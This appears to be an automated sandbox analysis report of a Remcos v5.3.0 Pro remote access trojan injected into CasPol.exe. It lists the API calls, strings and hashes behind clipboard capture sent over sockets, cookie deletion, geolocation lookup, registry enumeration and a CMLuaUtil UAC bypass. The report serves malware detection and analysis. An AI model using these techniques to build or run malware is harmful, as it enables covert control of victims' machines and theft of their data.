                                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                                                                                • Part of subcall function 00418AB1: MapVirtualKeyA.USER32 ref: 00418AB7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InputSend$Virtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 1167301434-0
                                                                                                              • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                              • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                                                                              • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                              • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                                                                              Function 00415A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • OpenClipboard.USER32 ref: 00415A46
                                                                                                              • EmptyClipboard.USER32 ref: 00415A54
                                                                                                              • CloseClipboard.USER32 ref: 00415A5A
                                                                                                              • OpenClipboard.USER32 ref: 00415A61
                                                                                                              • GetClipboardData.USER32 ref: 00415A71
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                              • CloseClipboard.USER32 ref: 00415A89
                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                              • String ID:
                                                                                                              • API String ID: 2172192267-0
                                                                                                              • Opcode ID: ed1c07982b29d0ead8c7efce27f1f73f7a3c6531811b5a16733390c9f1490fe0
                                                                                                              • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                                                              • Opcode Fuzzy Hash: ed1c07982b29d0ead8c7efce27f1f73f7a3c6531811b5a16733390c9f1490fe0
                                                                                                              • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                                                                              Function 00447E3A Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 00447EBC
                                                                                                              • _free.LIBCMT ref: 00447EE0
                                                                                                              • _free.LIBCMT ref: 00448067
                                                                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                              • _free.LIBCMT ref: 00448233
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                              • String ID:
                                                                                                              • API String ID: 314583886-0
                                                                                                              • Opcode ID: 27ecba2f8841fd9bc374cbfe0ae16a2ddc94f833dde90b0adb5aed01379e1676
                                                                                                              • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                                                                                                              • Opcode Fuzzy Hash: 27ecba2f8841fd9bc374cbfe0ae16a2ddc94f833dde90b0adb5aed01379e1676
                                                                                                              • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                                                                                                              Function 0044F806 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free
                                                                                                              • String ID:
                                                                                                              • API String ID: 269201875-0
                                                                                                              • Opcode ID: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                                                                              • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                                                              • Opcode Fuzzy Hash: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                                                                              • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                                                              Function 00443F7B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                                                              • _free.LIBCMT ref: 00444086
                                                                                                              • _free.LIBCMT ref: 0044409D
                                                                                                              • _free.LIBCMT ref: 004440BC
                                                                                                              • _free.LIBCMT ref: 004440D7
                                                                                                              • _free.LIBCMT ref: 004440EE
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$AllocateHeap
                                                                                                              • String ID: J7D
                                                                                                              • API String ID: 3033488037-1677391033
                                                                                                              • Opcode ID: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                                                                              • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                                                              • Opcode Fuzzy Hash: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                                                                              • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                                                              Function 0044A0C3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetConsoleCP.KERNEL32 ref: 0044A105
                                                                                                              • __fassign.LIBCMT ref: 0044A180
                                                                                                              • __fassign.LIBCMT ref: 0044A19B
                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000), ref: 0044A1E0
                                                                                                              • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000), ref: 0044A219
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                              • String ID:
                                                                                                              • API String ID: 1324828854-0
                                                                                                              • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                              • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                                                              • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                              • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                                                              Function 004559CA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free
                                                                                                              • String ID: HE$HE
                                                                                                              • API String ID: 269201875-1978648262
                                                                                                              • Opcode ID: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                                                                              • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                                                              • Opcode Fuzzy Hash: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                                                                              • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                                                              Function 00412C88 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.ADVAPI32 ref: 00412CC1
                                                                                                                • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00412A4C
                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              • RegCloseKey.ADVAPI32(TUFTUF), ref: 00412E31
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseEnumInfoOpenQuerysend
                                                                                                              • String ID: TUFTUF$>G$DG$DG
                                                                                                              • API String ID: 3114080316-344394840
                                                                                                              • Opcode ID: bf697a078cb867d97e45357ac50b9e71af34c85f47cf55f872e92a0cd902ea26
                                                                                                              • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                                                                              • Opcode Fuzzy Hash: bf697a078cb867d97e45357ac50b9e71af34c85f47cf55f872e92a0cd902ea26
                                                                                                              • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                              Function 00437A80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                              • String ID: csm
                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                              • Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                                                                              • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                                                              • Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                                                                              • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                                                              Function 0040B6EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00412513: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                • Part of subcall function 00412513: RegQueryValueExA.ADVAPI32 ref: 00412554
                                                                                                                • Part of subcall function 00412513: RegCloseKey.ADVAPI32(?), ref: 0041255F
                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                              • API String ID: 1133728706-4073444585
                                                                                                              • Opcode ID: b2ac8dee5e5069ae19a2430ed362db1d01aada1bcbcc6095e396115e7a02ca7f
                                                                                                              • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                                                              • Opcode Fuzzy Hash: b2ac8dee5e5069ae19a2430ed362db1d01aada1bcbcc6095e396115e7a02ca7f
                                                                                                              • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                                                                              Function 00455903 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                                                                              • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                                                              • Opcode Fuzzy Hash: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                                                                              • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                                                              Function 0040FBEF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                                              • int.LIBCPMT ref: 0040FC0F
                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                              • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                              • String ID: P[G
                                                                                                              • API String ID: 2536120697-571123470
                                                                                                              • Opcode ID: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                                                                              • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                                                                              • Opcode Fuzzy Hash: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                                                                              • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                                                                              Function 0041A51B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                                                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                                                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                                                              Strings
                                                                                                              • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                              • String ID: http://geoplugin.net/json.gp
                                                                                                              • API String ID: 3121278467-91888290
                                                                                                              • Opcode ID: 8a2722a77a721669593b0367f0fdf2e0f92c97aa65a2f702c1d2453de3b58543
                                                                                                              • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                                                              • Opcode Fuzzy Hash: 8a2722a77a721669593b0367f0fdf2e0f92c97aa65a2f702c1d2453de3b58543
                                                                                                              • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                                                                              Function 0044FCDB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                                                                              • _free.LIBCMT ref: 0044FD29
                                                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000), ref: 00446ADB
                                                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                              • _free.LIBCMT ref: 0044FD34
                                                                                                              • _free.LIBCMT ref: 0044FD3F
                                                                                                              • _free.LIBCMT ref: 0044FD93
                                                                                                              • _free.LIBCMT ref: 0044FD9E
                                                                                                              • _free.LIBCMT ref: 0044FDA9
                                                                                                              • _free.LIBCMT ref: 0044FDB4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                              • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                                                              • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                              • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                                                              Function 0041A463 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                                • Part of subcall function 00412513: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                • Part of subcall function 00412513: RegQueryValueExA.ADVAPI32 ref: 00412554
                                                                                                                • Part of subcall function 00412513: RegCloseKey.ADVAPI32(?), ref: 0041255F
                                                                                                              • StrToIntA.SHLWAPI(00000000), ref: 0041A4D9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                              • API String ID: 1866151309-2070987746
                                                                                                              • Opcode ID: 55ad628b9ffecf6fc05846b0b449cc9ef91119f19e10ab231a0cee3385cadad7
                                                                                                              • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                                                              • Opcode Fuzzy Hash: 55ad628b9ffecf6fc05846b0b449cc9ef91119f19e10ab231a0cee3385cadad7
                                                                                                              • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE
                                                                                                              Function 00406815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CoInitializeEx.OLE32(00000000,00000002), ref: 00406835
                                                                                                                • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                                • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                              • CoUninitialize.OLE32 ref: 0040688E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InitializeObjectUninitialize_wcslen
                                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                              • API String ID: 3851391207-2637227304
                                                                                                              • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                              • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                              • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                              • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                              Function 0040FED2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                              • int.LIBCPMT ref: 0040FEF2
                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                              • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                              • String ID: H]G
                                                                                                              • API String ID: 2536120697-1717957184
                                                                                                              • Opcode ID: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                                                                              • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                                                                              • Opcode Fuzzy Hash: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                                                                              • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                                                                              Function 0040B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                              • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                              Strings
                                                                                                              • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                              • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                              • UserProfile, xrefs: 0040B2B4
                                                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DeleteErrorFileLast
                                                                                                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                              • API String ID: 2018770650-304995407
                                                                                                              • Opcode ID: 89984b89c506dd7c72a5c030867ac5c43e97c4af1a23029286eaf0e318e25243
                                                                                                              • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                                                              • Opcode Fuzzy Hash: 89984b89c506dd7c72a5c030867ac5c43e97c4af1a23029286eaf0e318e25243
                                                                                                              • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                                                                              Function 0041BEB0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • AllocConsole.KERNEL32 ref: 0041BEB9
                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                                                              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Console$AllocOutputShowWindow
                                                                                                              • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                                              • API String ID: 2425139147-2527699604
